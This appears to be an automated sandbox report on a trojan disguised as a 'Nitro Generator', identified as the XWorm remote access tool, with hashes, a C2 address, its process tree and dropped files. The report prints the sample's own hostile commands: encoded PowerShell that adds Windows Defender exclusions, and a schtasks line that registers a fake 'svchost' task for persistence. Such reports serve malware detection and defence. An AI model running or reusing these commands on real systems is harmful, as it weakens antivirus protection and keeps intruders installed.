Analysis

  • max time kernel
    145s
  • max time network
    148s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    21-06-2024 23:03

General

  • Target

    Nitro Generator v1.exe

  • Size

    225KB

  • MD5

    a2da88430b3dd46d547cd75126ecee69

  • SHA1

    c41229461c4b6ddc695c8a01940e76a0f0b930b7

  • SHA256

    c95d4d86a71f2b53bf73a48d9b04f924f2527c7886b7db877b2d339ecda9ef12

  • SHA512

    c3dcfa26d3c2a10f5ac58cd22f2c5bf5fbb986c11a43a547e0ea1f4ac016819de46bfadab6d111e83c2c9f572285a7f3ea4e275944ef7c16bf98426283fac859

  • SSDEEP

    3072:LVAzYZD5kDzAgXKnj8meFDm8Zk5WFEw2zlXPcARAK4Mtx1Nnva/Vk5uAOcU3aQg7:LVBZ+DsfnwmlMkQEaARV4MT6dY9Mg59

Malware Config

Extracted

Family

xworm

C2

runderscore00-25851.portmap.host:25851

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe
    "C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:68
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2716
    • C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
      "C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
      2⤵
      • Executes dropped EXE
      PID:2920
    • C:\Windows\Nitro Generator.exe
      "C:\Windows\Nitro Generator.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2656
  • C:\ProgramData\svchost
    C:\ProgramData\svchost
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2512
  • C:\ProgramData\svchost
    C:\ProgramData\svchost
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1016

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    8592ba100a78835a6b94d5949e13dfc1

    SHA1

    63e901200ab9a57c7dd4c078d7f75dcd3b357020

    SHA256

    fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

    SHA512

    87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.log

    Filesize

    654B

    MD5

    16c5fce5f7230eea11598ec11ed42862

    SHA1

    75392d4824706090f5e8907eee1059349c927600

    SHA256

    87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

    SHA512

    153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    d0768b8870ea9d68a7334004b95bbba2

    SHA1

    96828a3b50436db8be2cc84464941bda69cc9be8

    SHA256

    3f2b4482354da125b4b9e8770c092839a7617e42be0baf8abd1776b3a5188a86

    SHA512

    be1d8d7f98b11cb35b6a6ded20751a5be0a79fe9a8f1301f1db28fb08f2937f3dead07a11edd23dc55897939d4ad68b0903c7a5574c334b0294a7d11570df4c4

  • C:\Users\Admin\AppData\Local\Temp\NitroGen.exe

    Filesize

    139KB

    MD5

    16c70bc93e70148d8e32877fb69c5163

    SHA1

    9997631ad75d02297a4c7a06c37db115a0a1c0ec

    SHA256

    b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d

    SHA512

    02242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnbku4vv.qeo.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Windows\Nitro Generator.exe

    Filesize

    77KB

    MD5

    8bbf53c41f2625a3c4e608ad13cb2c55

    SHA1

    3335287d42f6e674eb1d4465949e02d262bb8391

    SHA256

    ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299

    SHA512

    9c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec

  • memory/68-8-0x0000017FA77F0000-0x0000017FA7812000-memory.dmp

    Filesize

    136KB

  • memory/68-13-0x0000017FA78A0000-0x0000017FA7916000-memory.dmp

    Filesize

    472KB

  • memory/68-10-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp

    Filesize

    3.0MB

  • memory/68-9-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp

    Filesize

    3.0MB

  • memory/68-7-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp

    Filesize

    3.0MB

  • memory/68-101-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp

    Filesize

    3.0MB

  • memory/2280-0-0x00000000005C0000-0x00000000005FE000-memory.dmp

    Filesize

    248KB

  • memory/2280-56-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp

    Filesize

    3.0MB

  • memory/2280-2-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp

    Filesize

    3.0MB

  • memory/2280-1-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp

    Filesize

    3.0MB

  • memory/5024-54-0x0000000000F90000-0x0000000000FAA000-memory.dmp

    Filesize

    104KB